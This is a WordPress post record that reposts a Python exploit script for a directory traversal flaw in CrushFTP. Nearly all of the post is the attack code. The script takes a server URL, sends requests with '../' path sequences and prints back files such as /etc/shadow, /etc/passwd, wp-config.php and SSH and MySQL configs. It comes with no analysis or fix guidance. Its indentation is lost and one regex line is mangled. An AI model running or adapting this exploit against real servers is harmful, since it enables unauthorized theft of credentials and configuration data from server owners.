{"id":56831,"date":"2024-05-14T19:50:17","date_gmt":"2024-05-14T15:50:17","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178565\/crushftp-traversal.txt"},"modified":"2024-05-14T19:50:17","modified_gmt":"2024-05-14T15:50:17","slug":"crushftp-directory-traversal","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/crushftp-directory-traversal\/","title":{"rendered":"CrushFTP Directory Traversal"},"content":{"rendered":"<p>## Exploit Title: CrushFTP Directory Traversal<br \/>## Google Dork: N\/A<br \/># Date: 2024-04-30<br \/># Exploit Author: [Abdualhadi khalifa (https:\/\/twitter.com\/absholi_ly)<br \/>## Vendor Homepage: https:\/\/www.crushftp.com\/<br \/>## Software Link: https:\/\/www.crushftp.com\/download\/<br \/>## Version: below 10.7.1 and 11.1.0 (as well as legacy 9.x)<br \/>## Tested on: Windows10<\/p>\n<p>import requests<br \/>import re<\/p>\n<p># Regular expression to validate the URL<br \/>def is_valid_url(url):<br \/>regex = re.compile(<br \/>r&#8217;^(?:http|ftp)s?:\/\/&#8217; # http:\/\/ or https:\/\/<br \/>r'(?:(?:A-Z0-9?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|&#8217; # domain&#8230;<br \/>r&#8217;localhost|&#8217; # localhost&#8230;<br \/>r&#8217;\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}|&#8217; # &#8230;or ipv4<br \/>r&#8217;\\[?[A-F0-9]*:[A-F0-9:]+\\]?)&#8217; # &#8230;or ipv6<br \/>r'(?::\\d+)?&#8217; # optional: port<br \/>r'(?:\/?|[\/?]\\S+)$&#8217;, re.IGNORECASE)<br \/>return re.match(regex, url) is not None<\/p>\n<p># Function to scan for the vulnerability<br \/>def scan_for_vulnerability(url, target_files):<br \/>print(&#8220;Scanning for vulnerability in the following files:&#8221;)<br \/>for target_file in target_files:<br \/>print(target_file)<\/p>\n<p>for target_file in target_files:<br \/>try:<br \/>response = requests.get(url + &#8220;?\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/&#8221; + target_file, timeout=10)<br \/>if response.status_code == 200 and target_file.split(&#8216;\/&#8217;)[-1] in response.text:<br \/>print(&#8220;vulnerability detected in file&#8221;, target_file)<br \/>print(&#8220;Content of file&#8221;, target_file, &#8220;:&#8221;)<br \/>print(response.text)<br \/>else:<br \/>print(&#8220;vulnerability not detected or unexpected response for file&#8221;, target_file)<br \/>except requests.exceptions.RequestException as e:<br \/>print(&#8220;Error connecting to the server:&#8221;, e)<\/p>\n<p># User input<br \/>input_url = input(&#8220;Enter the URL of the CrushFTP server: &#8220;)<\/p>\n<p># Validate the URL<br \/>if is_valid_url(input_url):<br \/># Expanded list of allowed files<br \/>target_files = [<br \/>&#8220;\/var\/www\/html\/index.php&#8221;,<br \/>&#8220;\/var\/www\/html\/wp-config.php&#8221;,<br \/>&#8220;\/etc\/passwd&#8221;,<br \/>&#8220;\/etc\/shadow&#8221;,<br \/>&#8220;\/etc\/hosts&#8221;,<br \/>&#8220;\/etc\/ssh\/sshd_config&#8221;,<br \/>&#8220;\/etc\/mysql\/my.cnf&#8221;,<br \/># Add more files as needed<\/p>\n<p>]# Start the scan<br \/>scan_for_vulnerability(input_url, target_files)<br \/>else:<br \/>print(&#8220;Invalid URL entered. Please enter a valid URL.&#8221;)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Exploit Title: CrushFTP Directory Traversal## Google Dork: N\/A# Date: 2024-04-30# Exploit Author: [Abdualhadi khalifa (https:\/\/twitter.com\/absholi_ly)## Vendor Homepage: https:\/\/www.crushftp.com\/## Software Link: https:\/\/www.crushftp.com\/download\/## Version: below 10.7.1 and 11.1.0 (as well as legacy 9.x)## Tested on: Windows10 import requestsimport re # Regular expression to validate the URLdef is_valid_url(url):regex = re.compile(r&#8217;^(?:http|ftp)s?:\/\/&#8217; # http:\/\/ or https:\/\/r'(?:(?:A-Z0-9?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|&#8217; # domain&#8230;r&#8217;localhost|&#8217; # &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56831","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56831"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56831\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}